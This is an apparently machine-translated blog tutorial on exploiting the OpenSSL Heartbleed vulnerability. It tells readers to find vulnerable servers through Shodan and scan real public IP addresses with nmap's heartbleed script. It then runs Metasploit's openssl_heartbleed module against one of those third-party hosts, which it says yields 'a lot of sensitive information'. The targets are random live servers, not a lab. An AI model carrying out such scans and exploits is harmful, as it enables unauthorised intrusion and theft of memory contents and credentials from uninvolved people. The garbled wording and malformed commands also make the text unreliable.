How to analyze the recurrence of openssl1.0.1 bleeding loophole
In this issue, the editor will bring you about how to analyze the recurrence of openssl1.0.1 blood loopholes. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.
First use shadan to search for the host
The search format is
Openssl 1.0.1a
Then randomly find a host with a request of 200 for missing scan.
First, use special tools for scanning
219.117.252.132
It is found that there is nothing available for this host.
We need another one.
149.202.69.214
Found that there could be one that could be used.
Second, use nmap tool to scan
Nmap-sV-p 443 149.202.69.214-script=ssl-heartbleed.nse
It was found that the number of the loophole was revealed below.
After the discovery of the loophole, we should take advantage of it.
Open our msf
Then search for the module about xinzang dripping blood.
Search heartbleed
We chose to be the first to enter
Use auxiliary/scanner/ssl/openssl_heartbleed
Check the modules that need to be set up again
Set rhosts 443 149.202.69.214 port he gave, no longer set set VERBOSE true
Run, found to get a lot of sensitive information.
.
The above is the editor for you to share how to analyze the openssl1.0.1 blood loophole repeated, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.